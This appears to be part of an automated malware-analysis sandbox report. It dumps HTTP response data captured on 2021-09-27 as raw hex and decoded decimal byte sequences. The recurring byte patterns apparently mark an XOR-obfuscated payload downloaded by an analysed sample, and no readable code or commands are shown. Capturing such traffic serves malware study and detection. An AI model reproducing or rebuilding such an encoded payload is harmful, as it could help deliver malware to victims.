                                                                                              Data Ascii: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 40 229 109 115 50 48 50 50 84 114 117 146 143 50 48 138 54 84 114 117 109 112 50 112 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 176 50
                                                                                              2021-09-27 18:27:26 UTC4INData Raw: 20 32 34 38 20 35 31 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 38 20 35 34 20 38 34 20 31 38 20 39 31 20 33 31 20 32 31 20 39 34 20 39 35 20 38 31 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 30 39 20 31 31 32 20 32 34 38 20 34 39 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 35 33 20 31 30 39 20 31 31 32 20 31 31 32 20 33 30 20 36 34 20 36 39 20 33 38 20 31 37 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 34 20 38 31 20 35 31 20 35 34
                                                                                              Data Ascii: 248 51 54 84 112 117 109 112 50 48 50 54 84 114 117 109 112 50 48 18 54 84 18 91 31 21 94 95 81 54 84 126 117 109 112 50 48 48 54 84 112 117 109 112 248 49 50 54 84 114 117 109 112 50 48 50 54 84 114 53 109 112 112 30 64 69 38 17 117 109 112 114 81 51 54
                                                                                              2021-09-27 18:27:26 UTC5INData Raw: 20 31 32 30 20 39 35 20 31 30 39 20 39 39 20 32 20 34 39 20 35 30 20 36 31 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 35 30 20 33 33 20 37 36 20 35 32 20 38 34 20 31 31 34 20 31 31 33 20 32 20 37 37 20 35 30 20 34 38 20 35 36 20 32 38 20 38 34 20 39 37 20 36 39 20 31 30 38 20 31 31 32 20 35 37 20 34 38 20 35 30 20 35 34 20 38 30 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 34 39 20 34 38 20 35 30 20 35 30 20 35 39 20 37 36 20 31 31 37 20 31 30 39 20 31 32 32 20 32 34 20 34 38 20 33 33 20 36 20 38 35 20 31 31 34 20 31 32 36 20 31 30 39 20 31 31 32 20 35 30 20 35 33 20 35 30 20 35 34 20 36 39 20 31 32 20 31 31 33 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 33 20 35 34 20 38 34 20 31 32 30 20 39 35 20 31 30 39 20 39 39 20 32 20 34 39
                                                                                              Data Ascii: 120 95 109 99 2 49 50 61 84 114 117 110 112 50 33 76 52 84 114 113 2 77 50 48 56 28 84 97 69 108 112 57 48 50 54 80 114 117 124 14 49 48 50 50 59 76 117 109 122 24 48 33 6 85 114 126 109 112 50 53 50 54 69 12 113 109 112 54 95 13 54 84 120 95 109 99 2 49
                                                                                              2021-09-27 18:27:26 UTC6INData Raw: 31 20 31 35 35 20 35 30 20 35 34 20 38 35 20 39 30 20 36 31 20 31 30 39 20 31 31 32 20 35 36 20 36 37 20 31 32 33 20 35 34 20 38 34 20 31 32 30 20 31 35 20 33 30 20 35 38 20 35 30 20 34 38 20 35 36 20 33 35 20 31 32 31 20 31 31 33 20 38 33 20 37 30 20 31 31 39 20 31 37 38 20 35 36 20 35 30 20 35 34 20 38 30 20 38 39 20 31 31 37 20 31 39 20 31 32 30 20 35 30 20 34 38 20 35 34 20 32 33 30 20 39 32 20 31 31 34 20 31 31 37 20 31 31 38 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 36 34 20 32 39 20 36 32 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 35 34 20 35 34 20 38 34 20 38 39 20 31 31 30 20 36 34 20 31 31 38 20 32 30 20 32 33 37 20 37 38 20 35 34 20 38 34 20 31 31 34 20 31 32 37 20 37 30 20 31 33 36 20 37 31 20 31 38 30 20 35 30 20 35 34 20 38 35 20
                                                                                              Data Ascii: 1 155 50 54 85 90 61 109 112 56 67 123 54 84 120 15 30 58 50 48 56 35 121 113 83 70 119 178 56 50 54 80 89 117 19 120 50 48 54 230 92 114 117 118 88 116 48 50 60 64 29 62 109 112 56 24 54 54 84 89 110 64 118 20 237 78 54 84 114 127 70 136 71 180 50 54 85
                                                                                              2021-09-27 18:27:26 UTC8INData Raw: 34 20 39 34 20 31 35 34 20 31 31 32 20 34 39 20 30 20 35 36 20 35 34 20 39 31 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 37 38 20 31 30 31 20 38 38 20 31 30 36 20 38 36 20 32 36 20 31 31 33 20 35 30 20 35 34 20 39 34 20 38 38 20 38 33 20 37 30 20 31 33 35 20 35 30 20 33 35 20 32 20 35 30 20 38 34 20 31 31 31 20 31 31 37 20 31 30 39 20 31 31 32 20 35 37 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 33 20 39 38 20 36 34 20 39 38 20 32 30 20 35 31 20 33 39 20 34 33 20 31 32 31 20 31 32 35 20 38 33 20 36 39 20 33 34 20 35 30 20 34 38 20 35 36 20 33 30 20 37 20 31 31 34 20 31 31 37 20 31 30 33 20 39 30 20 32 30 20 32 37 20 32 32 32 20 31 36 20 31 32 37 20 31 35 37 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20
                                                                                              Data Ascii: 4 94 154 112 49 0 56 54 91 114 117 109 112 50 48 50 52 78 101 88 106 86 26 113 50 54 94 88 83 70 135 50 35 2 50 84 111 117 109 112 57 48 50 39 86 103 98 64 98 20 51 39 43 121 125 83 69 34 50 48 56 30 7 114 117 103 90 20 27 222 16 127 157 117 109 112 33 0
                                                                                              2021-09-27 18:27:26 UTC9INData Raw: 20 35 34 20 38 32 20 31 31 32 20 39 39 20 32 34 37 20 34 20 35 36 20 34 38 20 35 30 20 34 35 20 37 34 20 39 35 20 31 32 37 20 37 35 20 31 34 20 35 20 34 38 20 35 30 20 35 30 20 31 32 30 20 39 36 20 39 34 20 31 31 30 20 31 32 32 20 32 35 20 31 39 36 20 37 36 20 30 20 38 34 20 31 31 34 20 31 31 33 20 31 30 37 20 38 38 20 31 30 34 20 34 39 20 35 30 20 34 38 20 31 32 31 20 31 31 38 20 39 38 20 31 30 32 20 39 31 20 34 38 20 33 38 20 35 37 20 34 39 20 31 32 34 20 31 30 39 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 33 35 20 32 20 35 33 20 38 34 20 36 31 20 31 31 37 20 31 30 39 20 31 31 32 20 33 34 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 30 20 32 33 39 20 32 30 20 36 36 20 35 30 20 34 38 20 35 31 20 37 31 20 31 30 32 20 31 31 34 20 31 31 37 20 31 30 38
                                                                                              Data Ascii: 54 82 112 99 247 4 56 48 50 45 74 95 127 75 14 5 48 50 50 120 96 94 110 122 25 196 76 0 84 114 113 107 88 104 49 50 48 121 118 98 102 91 48 38 57 49 124 109 117 109 118 24 35 2 53 84 61 117 109 112 34 48 50 39 86 100 239 20 66 50 48 51 71 102 114 117 108
                                                                                              2021-09-27 18:27:26 UTC10INData Raw: 31 32 20 35 36 20 33 35 20 35 37 20 31 34 20 31 39 38 20 31 31 34 20 31 31 37 20 31 30 39 20 39 38 20 35 37 20 32 34 20 31 30 39 20 35 34 20 38 34 20 31 32 30 20 31 30 32 20 31 30 36 20 31 31 38 20 33 35 20 35 35 20 37 33 20 33 39 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 36 20 35 30 20 34 38 20 35 36 20 32 36 20 38 31 20 37 34 20 30 20 31 30 39 20 31 31 32 20 35 30 20 33 39 20 31 37 38 20 36 33 20 38 34 20 31 31 34 20 31 31 33 20 37 37 20 32 30 38 20 32 35 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 39 37 20 35 33 20 37 35 20 33 35 20 35 34 20 38 34 20 31 31 38 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 32 36 20 31 30 36 20 38 34 20 31 31 34 20 31 32 37 20 36 39 20 31 39 37 20 35 30 20 34 38 20 35 32 20
                                                                                              Data Ascii: 12 56 35 57 14 198 114 117 109 98 57 24 109 54 84 120 102 106 118 35 55 73 39 84 114 113 2 16 50 48 56 26 81 74 0 109 112 50 39 178 63 84 114 113 77 208 25 224 44 30 171 114 117 107 97 53 75 35 54 84 118 249 37 112 50 49 26 106 84 114 127 69 197 50 48 52
                                                                                              2021-09-27 18:27:26 UTC12INData Raw: 31 30 37 20 31 32 34 20 35 38 20 35 30 20 35 33 20 31 37 32 20 34 35 20 35 38 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 30 20 35 30 20 35 34 20 38 35 20 31 35 20 31 30 30 20 31 30 39 20 31 31 32 20 35 34 20 35 36 20 34 38 20 34 39 20 36 37 20 34 32 20 32 33 39 20 32 30 20 36 36 20 35 30 20 34 38 20 35 31 20 37 31 20 31 30 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 33 20 36 31 20 34 38 20 35 30 20 35 30 20 39 32 20 31 31 32 20 31 31 34 20 31 31 37 20 34 30 20 31 36 38 20 36 38 20 31 35 33 20 35 34 20 38 34 20 31 31 35 20 38 20 31 32 35 20 31 31 32 20 35 30 20 35 32 20 35 38 20 35 32 20 38 33 20 31 30 37 20 34 35 20 32 34 37 20 39 20 31 38 20 34 38 20 35 30 20 35 35 20 33 37 20 38 32 20 31 31 37 20 31 30 39 20 31 31 33 20 37 39 20 33 34 20 35
                                                                                              Data Ascii: 107 124 58 50 53 172 45 58 117 109 113 67 120 50 54 85 15 100 109 112 54 56 48 49 67 42 239 20 66 50 48 51 71 102 114 117 108 13 61 48 50 50 92 112 114 117 40 168 68 153 54 84 115 8 125 112 50 52 58 52 83 107 45 247 9 18 48 50 55 37 82 117 109 113 79 34 5
                                                                                              2021-09-27 18:27:26 UTC13INData Raw: 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 39 20 34 34 20 33 31 20 33 39 20 31 31 34 20 38 34 20 31 31 39 20 31 30 35 20 31 30 33 20 33 31 20 33 33 20 32 30 20 31 36 20 38 36 20 31 31 39 20 39 38 20 36 34 20 39 37 20 32 30 20 32 32 20 32 34 20 37 35 20 39 35 20 31 31 34 20 31 31 37 20 31 30 35 20 39 31 20 32 31 36 20 37 37 20 36 32 20 35 34 20 38 34 20 31 31 38 20 39 34 20 31 33 35 20 31 33 20 36 33 20 34 38 20 35 30 20 35 30 20 31 32 37 20 31 35 32 20 31 31 37 20 31 32 36 20 36 34 20 35 32 20 34 38 20 31 38 31 20 35 34 20 38 34 20 31 31 34 20 39 37 20 31 30 39 20 31 31 32 20 33 35 20 35 30 20 33 37 20 31 36 37 20 36 36 20 39 34 20 39 34 20 37 35 20 31 31 35 20 31 38 38 20 38 39 20 33 36 20 32 36 20 31 31 35 20 38 34 20 31 31 34 20 31 31 34 20 31 32
                                                                                              Data Ascii: 14 117 109 114 49 44 31 39 114 84 119 105 103 31 33 20 16 86 119 98 64 97 20 22 24 75 95 114 117 105 91 216 77 62 54 84 118 94 135 13 63 48 50 50 127 152 117 126 64 52 48 181 54 84 114 97 109 112 35 50 37 167 66 94 94 75 115 188 89 36 26 115 84 114 114 12
                                                                                              2021-09-27 18:27:26 UTC14INData Raw: 31 30 39 20 31 31 36 20 34 39 20 34 35 20 33 36 20 32 36 20 39 34 20 38 34 20 32 36 20 35 20 31 31 32 20 35 30 20 35 38 20 32 34 20 31 36 20 31 32 37 20 31 35 38 20 38 33 20 37 30 20 31 33 32 20 34 39 20 30 20 35 36 20 35 34 20 31 30 30 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 37 36 20 31 30 34 20 38 38 20 31 30 33 20 38 36 20 37 33 20 34 30 20 35 30 20 35 34 20 38 30 20 39 35 20 31 31 35 20 37 30 20 31 31 35 20 32 30 20 32 37 20 31 39 38 20 32 38 20 38 36 20 31 31 31 20 31 30 35 20 36 34 20 39 38 20 32 30 20 37 35 20 34 32 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 31 32 30 20 31 30 36 20 33 31 20 35 38 20 32 30 20 38 39 20 36 31 20 31 31 34 20 31 31 37 20 31 30 33 20 39 30 20 32 30 20 32 37 20 32 32 32 20
                                                                                              Data Ascii: 109 116 49 45 36 26 94 84 26 5 112 50 58 24 16 127 158 83 70 132 49 0 56 54 100 114 117 109 112 50 48 50 52 76 104 88 103 86 73 40 50 54 80 95 115 70 115 20 27 198 28 86 111 105 64 98 20 75 42 54 84 118 118 120 106 31 58 20 89 61 114 117 103 90 20 27 222
                                                                                              2021-09-27 18:27:26 UTC16INData Raw: 34 20 31 31 36 20 31 31 32 20 35 30 20 35 32 20 34 39 20 34 30 20 37 37 20 39 35 20 31 32 36 20 37 35 20 31 31 36 20 39 33 20 39 35 20 35 30 20 35 34 20 39 34 20 38 38 20 38 33 20 37 30 20 31 35 35 20 32 30 20 32 37 20 31 39 33 20 35 34 20 38 34 20 31 31 34 20 31 31 38 20 39 33 20 31 32 32 20 35 30 20 32 33 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 34 33 20 34 33 20 32 37 20 39 34 20 38 34 20 31 34 20 31 31 39 20 31 31 32 20 35 30 20 35 32 20 33 31 20 34 38 20 31 32 37 20 31 31 33 20 38 33 20 37 30 20 31 33 32 20 32 34 20 35 30 20 34 32 20 34 32 20 31 32 31 20 31 32 36 20 38 33 20 32 32 20 31 30 36 20 35 30 20 34 38 20 35 34 20 38 39 20 33 36 20 31 31 34 20 31 31 37 20 31 30 33 20 39 30 20 32 30 20 32 37 20 31
                                                                                              Data Ascii: 4 116 112 50 52 49 40 77 95 126 75 116 93 95 50 54 94 88 83 70 155 20 27 193 54 84 114 118 93 122 50 23 50 54 84 114 117 109 112 48 43 43 27 94 84 14 119 112 50 52 31 48 127 113 83 70 132 24 50 42 42 121 126 83 22 106 50 48 54 89 36 114 117 103 90 20 27 1
                                                                                              2021-09-27 18:27:26 UTC17INData Raw: 31 34 20 31 31 37 20 31 30 35 20 31 31 20 33 36 20 34 38 20 35 30 20 35 30 20 38 31 20 39 30 20 31 39 34 20 31 30 39 20 31 31 32 20 35 32 20 32 36 20 35 30 20 35 34 20 38 34 20 31 31 33 20 36 39 20 31 30 33 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 34 36 20 34 33 20 33 31 20 34 39 20 31 31 34 20 39 30 20 32 33 35 20 31 30 39 20 31 31 32 20 35 32 20 32 36 20 32 30 20 32 39 20 31 36 33 20 31 31 34 20 31 31 31 20 36 39 20 32 33 37 20 35 30 20 34 38 20 35 32 20 32 38 20 38 34 20 39 37 20 36 39 20 31 30 35 20 31 31 32 20 31 36 39 20 34 38 20 35 30 20 35 34 20 37 36 20 31 31 34 20 31 31 37 20 31 32 34 20 31 30 35 20 31 39 31 20 31 33 39 20 35 30 20 35 34 20 38 35 20 31 30 38 20 37 39 20 31 38 20
                                                                                              Data Ascii: 14 117 105 11 36 48 50 50 81 90 194 109 112 52 26 50 54 84 113 69 103 112 61 48 50 54 84 114 117 109 115 46 43 31 49 114 90 235 109 112 52 26 20 29 163 114 111 69 237 50 48 52 28 84 97 69 105 112 169 48 50 54 76 114 117 124 105 191 139 50 54 85 108 79 18
                                                                                              2021-09-27 18:27:26 UTC18INData Raw: 36 36 20 37 39 20 31 38 34 20 35 30 20 35 34 20 38 30 20 38 39 20 31 36 39 20 36 39 20 36 30 20 35 30 20 34 38 20 35 36 20 33 39 20 38 30 20 31 32 31 20 39 33 20 31 32 20 31 31 32 20 35 30 20 35 38 20 32 33 36 20 35 34 20 38 33 20 38 38 20 31 30 39 20 31 38 39 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 34 20 38 34 20 31 32 32 20 31 31 37 20 34 30 20 36 31 20 35 30 20 36 33 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 30 32 20 39 33 20 31 31 36 20 35 30 20 39 36 20 35 30 20 35 34 20 38 34 20 31 30 35 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 36 37 20 37 32 20 35 34 20 38 34 20 31 32 30 20 31 31 30 20 36 34 20 31 32 33 20 32 30 20 35 35 20 39 33 20 37 35 20 38 34 20 31 31 34 20 31 32 37 20 36 34 20 31 31 39 20 32 35 20 35 31 20 35 37 20 32 39 20 31
                                                                                              Data Ascii: 66 79 184 50 54 80 89 169 69 60 50 48 56 39 80 121 93 12 112 50 58 236 54 83 88 109 189 113 34 48 50 54 84 122 117 40 61 50 63 116 54 84 115 102 93 116 50 96 50 54 84 105 117 109 97 48 67 72 54 84 120 110 64 123 20 55 93 75 84 114 127 64 119 25 51 57 29 1
                                                                                              2021-09-27 18:27:26 UTC20INData Raw: 37 20 31 31 32 20 35 30 20 35 38 20 35 38 20 39 32 20 31 33 20 31 31 36 20 32 35 31 20 32 31 38 20 32 36 20 32 36 20 37 31 20 35 30 20 35 34 20 39 34 20 32 37 20 31 30 32 20 31 30 37 20 39 37 20 35 35 20 35 34 20 35 38 20 33 39 20 38 32 20 32 39 20 32 34 37 20 31 30 39 20 31 31 32 20 35 36 20 36 31 20 35 38 20 36 33 20 31 32 20 31 32 36 20 31 32 35 20 31 30 37 20 32 35 34 20 31 33 33 20 33 20 32 33 30 20 33 39 20 38 31 20 32 39 20 31 32 20 31 30 39 20 31 31 32 20 35 36 20 35 34 20 32 34 20 33 37 20 31 30 30 20 31 31 39 20 31 31 37 20 36 39 20 31 31 32 20 35 30 20 34 38 20 34 35 20 35 34 20 38 34 20 39 39 20 31 31 39 20 31 31 36 20 31 30 34 20 36 35 20 37 30 20 35 30 20 35 34 20 39 34 20 31 30 38 20 38 38 20 31 31 39 20 38 36 20 35 32 20 35 32 20 39 33 20
                                                                                              Data Ascii: 7 112 50 58 58 92 13 116 251 218 26 26 71 50 54 94 27 102 107 97 55 54 58 39 82 29 247 109 112 56 61 58 63 12 126 125 107 254 133 3 230 39 81 29 12 109 112 56 54 24 37 100 119 117 69 112 50 48 45 54 84 99 119 116 104 65 70 50 54 94 108 88 119 86 52 52 93
                                                                                              2021-09-27 18:27:26 UTC21INData Raw: 32 32 20 39 33 20 31 32 31 20 38 34 20 31 31 34 20 31 31 35 20 37 30 20 39 39 20 32 30 20 32 37 20 31 39 36 20 35 32 20 37 39 20 31 30 30 20 38 39 20 31 30 31 20 38 36 20 39 33 20 39 36 20 35 30 20 35 34 20 38 32 20 38 39 20 31 31 38 20 37 35 20 39 31 20 31 39 36 20 32 36 20 35 30 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 39 31 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 20 32 33 20 34 38 20 35 30 20 35 30 20 31 32 30 20 31 31 35 20 39 35 20 31 31 31 20 31 30 33 20 33 36 20 32 38 20 33 36 20 31 36 20 31 31 34 20 31 31 32 20 31 34 20 37 35 20 31 31 32 20 35 30 20 35 32 20 33 36 20 35 32 20 34 37 20 38 36 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 31 38 33 20 35 30 20 35 34 20 39 34 20 38 34 20
                                                                                              Data Ascii: 22 93 121 84 114 115 70 99 20 27 196 52 79 100 89 101 86 93 96 50 54 82 89 118 75 91 196 26 50 54 87 66 124 109 91 50 48 50 54 84 114 117 111 11 23 48 50 50 120 115 95 111 103 36 28 36 16 114 112 14 75 112 50 52 36 52 47 86 117 109 116 93 183 50 54 94 84
                                                                                              2021-09-27 18:27:26 UTC22INData Raw: 37 20 31 32 35 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 35 20 33 31 20 35 37 20 32 30 20 34 38 20 31 32 34 20 32 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 35 20 35 31 20 35 36 20 32 39 20 31 36 31 20 31 31 32 20 31 34 20 36 38 20 31 31 32 20 35 30 20 35 32 20 34 39 20 38 39 20 32 31 36 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 32 39 20 35 30 20 37 33 20 33 31 20 38 34 20 31 31 34 20 31 31 33 20 31 31 30 20 33 31 20 31 39 31 20 34 38 20 35 30 20 36 30 20 38 30 20 39 30 20 33 39 20 31 30 39 20 31 31 32 20 35 36 20 39 35 20 39 37 20 35 34 20 38 34 20 31 32 30 20 38 39 20 31 31 31 20 31 37 34 20 31 31 33 20 35 30 20 37 33 20 33 31 20 38 34 20 31 31 34 20 31 31 33 20 31 31 30 20 31 31 36 20 32 36 20 39 38 20 35 30 20 35 34 20 39 34 20 32 39 20
                                                                                              Data Ascii: 7 125 114 117 105 105 31 57 20 48 124 251 117 109 122 25 51 56 29 161 112 14 68 112 50 52 49 89 216 114 117 103 92 29 50 73 31 84 114 113 110 31 191 48 50 60 80 90 39 109 112 56 95 97 54 84 120 89 111 174 113 50 73 31 84 114 113 110 116 26 98 50 54 94 29
                                                                                              2021-09-27 18:27:26 UTC24INData Raw: 32 20 32 35 20 31 32 20 38 38 20 38 39 20 31 35 33 20 31 30 32 20 39 31 20 32 30 32 20 35 36 20 33 32 20 34 38 20 37 30 20 31 31 35 20 39 33 20 32 35 34 20 31 31 32 20 35 30 20 35 38 20 33 33 20 35 30 20 37 30 20 31 31 38 20 39 33 20 32 34 39 20 31 31 32 20 35 30 20 35 38 20 33 32 20 35 35 20 31 32 34 20 32 32 35 20 31 31 37 20 31 30 39 20 31 32 32 20 33 33 20 35 33 20 33 32 20 35 31 20 31 32 34 20 32 33 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 39 38 20 35 30 20 35 34 20 39 34 20 39 30 20 32 32 37 20 31 30 39 20 31 31 32 20 35 36 20 33 33 20 35 32 20 38 39 20 31 39 35 20 31 31 34 20 31 31 37 20 31 30 33 20 39 38 20 35 31 20 32 34 20 31 37 30 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 37 34 20 31 32 30 20 39 33 20 31 36 39 20 35 30 20 35 34 20
                                                                                              Data Ascii: 2 25 12 88 89 153 102 91 202 56 32 48 70 115 93 254 112 50 58 33 50 70 118 93 249 112 50 58 32 55 124 225 117 109 122 33 53 32 51 124 231 117 109 122 26 98 50 54 94 90 227 109 112 56 33 52 89 195 114 117 103 98 51 24 170 54 84 120 88 174 120 93 169 50 54
                                                                                              2021-09-27 18:27:26 UTC25INData Raw: 35 32 20 32 34 20 37 38 20 35 34 20 38 34 20 31 31 36 20 39 33 20 31 35 20 31 31 32 20 35 30 20 35 34 20 32 36 20 38 32 20 38 34 20 31 31 34 20 31 31 35 20 31 39 20 37 31 20 35 30 20 34 38 20 35 34 20 32 36 20 39 34 20 39 30 20 31 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 38 34 20 35 34 20 38 34 20 31 31 36 20 39 33 20 32 34 30 20 31 31 32 20 35 30 20 35 34 20 32 36 20 31 30 35 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 32 35 30 20 35 30 20 34 38 20 35 32 20 32 38 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 36 34 20 35 34 20 34 38 20 37 37 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 32 34 20 31 38 33 20 35 34 20 38 34 20 31 31 36 20 31 31 31 20 36 34 20 30 20 32 30 20 37 38 20 31 31 33 20 35 34 20 38 34 20 31
                                                                                              Data Ascii: 52 24 78 54 84 116 93 15 112 50 54 26 82 84 114 115 19 71 50 48 54 26 94 90 18 109 112 52 24 84 54 84 116 93 240 112 50 54 26 105 84 114 115 69 250 50 48 52 28 84 114 117 110 64 54 48 77 54 84 114 117 109 112 50 24 183 54 84 116 111 64 0 20 78 113 54 84 1
                                                                                              2021-09-27 18:27:26 UTC26INData Raw: 31 31 33 20 31 30 39 20 33 20 35 30 20 34 38 20 35 30 20 31 37 20 38 34 20 31 31 34 20 31 30 30 20 37 37 20 33 34 20 31 38 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 35 20 34 38 20 35 30 20 34 38 20 34 32 20 36 34 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 31 36 32 20 35 30 20 35 34 20 39 34 20 31 30 36 20 38 38 20 31 31 30 20 38 36 20 32 35 20 31 30 20 35 37 20 32 39 20 31 37 35 20 39 36 20 31 31 36 20 36 39 20 32 32 37 20 35 30 20 34 38 20 35 36 20 34 34 20 31 32 31 20 38 38 20 38 33 20 37 37 20 32 20 31 38 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 39 38 20 35 30 20 32 34 20 31 36 36 20 35 34 20 38 34 20 31 32 30 20 31 30 33 20 31 30 39 20 38 38 20 31 36 37
                                                                                              Data Ascii: 113 109 3 50 48 50 17 84 114 100 77 34 18 224 44 30 171 114 117 107 88 135 48 50 48 42 64 117 109 116 93 162 50 54 94 106 88 110 86 25 10 57 29 175 96 116 69 227 50 48 56 44 121 88 83 77 2 18 224 44 30 171 114 117 107 98 50 24 166 54 84 120 103 109 88 167
                                                                                              2021-09-27 18:27:26 UTC28INData Raw: 31 30 34 20 35 30 20 34 38 20 34 31 20 38 39 20 35 35 20 31 31 34 20 31 31 37 20 31 30 33 20 31 37 32 20 32 33 36 20 31 36 20 32 33 20 33 30 20 32 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 39 20 35 33 20 33 33 20 35 33 20 32 32 20 36 34 20 38 32 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 38 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 38 31 20 35 30 20 35 34 20 39 34 20 31 37 32 20 31 31 37 20 37 31 20 31 30 33 20 33 37 20 34 39 20 32 36 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 39 20 31 31 32 20 31 31 32 20 32 34 30 20 35 30 20 35 36 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 35 30 20 32 35 34 20 35 30 20 32 39 20 31 37 33 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35
                                                                                              Data Ascii: 104 50 48 41 89 55 114 117 103 172 236 16 23 30 24 114 117 103 99 53 33 53 22 64 82 165 115 88 205 48 50 48 124 198 117 109 118 26 81 50 54 94 172 117 71 103 37 49 26 54 84 112 117 19 112 112 240 50 56 84 114 117 109 114 50 254 50 29 173 114 123 109 112 5
                                                                                              2021-09-27 18:27:26 UTC29INData Raw: 38 34 20 31 31 38 20 39 33 20 31 33 20 31 31 33 20 35 30 20 35 34 20 31 37 38 20 30 20 38 34 20 31 31 34 20 31 31 33 20 31 31 37 20 31 32 31 20 31 38 38 20 31 33 35 20 33 37 20 31 31 31 20 37 31 20 31 31 37 20 31 30 32 20 31 30 35 20 37 32 20 32 31 36 20 34 38 20 35 30 20 35 34 20 37 30 20 31 31 39 20 31 33 39 20 31 32 30 20 39 36 20 35 30 20 34 38 20 34 38 20 33 36 20 38 31 20 31 32 33 20 31 30 30 20 31 30 35 20 32 33 34 20 37 35 20 31 32 30 20 35 30 20 35 34 20 38 35 20 33 20 36 31 20 31 30 39 20 31 31 32 20 35 31 20 37 37 20 34 35 20 35 34 20 38 34 20 31 31 38 20 31 30 33 20 31 30 34 20 31 32 31 20 33 35 20 35 32 20 33 37 20 31 31 30 20 32 30 36 20 31 31 20 37 31 20 31 30 39 20 31 31 32 20 35 31 20 36 35 20 30 20 35 34 20 38 34 20 31 31 35 20 38 20 31
                                                                                              Data Ascii: 84 118 93 13 113 50 54 178 0 84 114 113 117 121 188 135 37 111 71 117 102 105 72 216 48 50 54 70 119 139 120 96 50 48 48 36 81 123 100 105 234 75 120 50 54 85 3 61 109 112 51 77 45 54 84 118 103 104 121 35 52 37 110 206 11 71 109 112 51 65 0 54 84 115 8 1
                                                                                              2021-09-27 18:27:26 UTC30INData Raw: 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 32 37 20 34 39 20 35 38 20 31 32 37 20 31 34 36 20 31 31 20 38 37 20 31 31 32 20 35 30 20 35 32 20 39 33 20 31 30 34 20 38 34 20 31 31 34 20 31 32 37 20 31 32 33 20 39 32 20 34 39 20 32 32 20 32 35 20 31 30 32 20 37 31 20 31 31 39 20 39 34 20 31 35 31 20 39 38 20 35 35 20 32 34 20 31 30 39 20 35 34 20 38 34 20 31 32 30 20 31 32 30 20 31 30 30 20 31 31 20 33 32 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 32 20 39 34 20 38 37 20 31 32 30 20 35 39 20 37 35 20 33 35 20 35 34 20 38 34 20 31 31 38 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 31 30 31 20 31 32 31 20 37 33 20 36 33 20 35 30 20 35 34 20 38 30 20 32 35 34 20 37 31 20 31 30 39 20 31 31 32
